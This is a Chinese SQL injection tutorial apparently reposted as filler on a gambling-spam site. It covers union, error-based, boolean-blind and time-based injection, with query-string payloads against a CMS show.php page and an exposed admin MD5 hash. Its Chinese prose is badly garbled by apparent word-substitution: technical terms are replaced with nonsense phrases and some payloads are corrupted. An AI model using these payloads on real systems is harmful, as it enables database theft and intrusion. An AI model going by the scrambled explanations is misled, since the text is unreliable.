SQL注入--亚洲娱乐网-thj 2019-08-07 08:20

        

        

        
        

        一 、先说一下SQL不断地流进亚洲娱乐网:联盟查询、报错不断地流进、乔治英国数学家和逻辑学家盲注、推延射手

        二、SQL不断地流进情绪

        假定是SQL 射手软弱性,射手工艺学的选择

        有回响吗? 有:联盟查询

        有什么毛病报表吗 有:报错不断地流进

        倘若在乔治英国数学家和逻辑学家典型健康状况 有:乔治英国数学家和逻辑学家盲注

        绝技 推延射手

        三、会议记录引见

        1.联盟查询 有回响(经过ID=1  id=2),可以运用。

        (1)经用效能

        version() mysql 通知库版本

        database() 提出通知库体系命名法

        user() 用户名

        current_user() 提出用户名

        system_user() 体系用户名

        @@datadir 通知库某方面

        @@versoin_compile_os 操控体系版本

        length() 反复字母串的上涂料

        substring()

        substr() 截取字母串

        mid()

        left() 从左翼开端,具有明确提出刻数的字母串

        concat() 不带师符的衔接字母串

        concat_ws() 带拆分器的衔接字母串

        group_conat() 一根衔接抱怨的用绳子系牢。

        ord() 反复到ASCII 码

        ascii()

        hex() 将字母串替换为巫婆

        unhex() hex 的反向操控

        md5() 反复MD5 值

        击败(X) 反复不超过x 最大积分的

        round() 反复限制因素x 相近积分的

        rand() 反复0-1 家庭般的温暖随机浮点小数点数

        load_file() 读取用纸覆盖,并以字母串产生反复用纸覆盖使满意

        sleep() 以睡觉打发日子工夫是明确提出的秒数

        假设(真,t,f) if 判别

        find_in_set() 反复字母串在字母串lis说话中肯臀部

        benchmark() 落实明确提出声明的次数

        name_const() 结出果实反复表

        (2) 手段

        用联盟槲皮素引人注目射手点

        决定提出列表说话中肯接(列)数 经过定单 by  一次尝试

        order by 1 order by 2 order by 15 有15个接

        判别显示位

        您可以选择获取提出某方面(@@basedir、提出通知库版本号(@@版本、提出登录用户、提出在运用的通知库(通知库。

        提出通知库表的体系命名法

        获取接名

        Userid    username      password

        接使满意

        admin:e10adc3949ba59abbe56e057f20f883e 密电码可以本义

        2. 报错不断地流进 显示通知库毛病 详细效能如联盟查询

        婴儿食品 获取通知库传达

        

        获取表名

        符号二 获取用户名  密电码

        

        符号三 获取通知库体系命名法

        

        三。乔治英国数学家和逻辑学家盲注

        (1)率先判别倘若属于乔治英国数学家和逻辑学家不断地流进

        ?id=33 and 1=1 --+ 显示普通网页

        ?id=33 and 1=2 --+  显示在不同普通呼叫的呼叫

        (2)计算查询使满意的上涂料(率先隐蔽的标注NA

        ?id=33 and 上涂料(database())>0

        ?id=33 and 上涂料(database())=3

        阐明提出通知库体系命名法的刻上涂料为3

        (3)通知库体系命名法逐位不断地流进

        ?id=33 and ASCII(SUBSTR((选择 database()),1,1)) = 99

        99 c

        ?id=33 and ASCII(SUBSTR(通知库,2,1)) =109

        109 m

        (4)查找表名

        (5)查找接名 查找通知

        4. 推延射手

        (1)不断地流进以获取提出通知库usernam

        ?id=33 and 假设(ASCII(SUBSTR(提出运用,1,1)) =114,以睡觉打发日子(5),1) --+

        114 r

        (2)查询通知库体系命名法

        :81/cms/show.php

        ?id=33 and if(ASCII(SUBSTR(通知库,1,1)) =105,以睡觉打发日子(5),1) --+

        (3)表名

        :81/cms/show.php

        ?id=33 and 假设(ASCII(SUBSTR((选择 table_name from information_schema.tables where table_schema=database()  limit 0,1),1,1)) <120,以睡觉打发日子(5),1) --+


返回
有心意 更有新意
欢迎拨打
  
Copyright © 亚洲博彩公司,亚洲城,亚洲娱乐网 版权所有 无